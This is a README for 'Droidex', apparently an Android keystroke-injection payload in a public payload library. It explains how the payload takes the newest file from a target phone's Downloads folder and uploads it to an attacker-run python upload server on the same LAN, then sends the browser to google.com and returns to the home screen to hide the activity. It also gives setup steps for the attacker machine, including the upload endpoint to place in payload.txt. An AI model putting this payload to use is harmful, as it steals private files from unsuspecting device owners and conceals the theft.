Path: blob/master/payloads/library/mobile/Android/Droidex/README.md
2971 views
REM TITLE: Droidex
REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
REM TARGET OS: Android (tested on Samsung S24 FE | Android 15 | One UI 7.0)
Droidex exfiltrates the top file stored in the Downloads directory of target mobile device to a self-hosted python webserver over LAN. Both the attacker machine and target device must be connected to the same LAN. The payload will use Google Search to navigate to the self-hosted webserver and upload the file. After exfiltration, the browser will navigate to google.com
and the device will return to the home screen to obfuscate activity.
REQUIRED DEPENDENCIES
Python module uploadserver
Install
uploadserver
on attack machine (python3 -m pip install --user uploadserver
).Enter
ifconfig
in terminal of attack machine (Linux) to find machine IP address.Place the IP address found via
ifconfig
into line 6 (DEFINE #IPA x.x.x.x:8000/upload
) of payload.txt.Start the webserver (
python3 -m uploadserver
).Perform attack.
The file will be saved to the current working directory on the attacker machine where the server is being hosted from.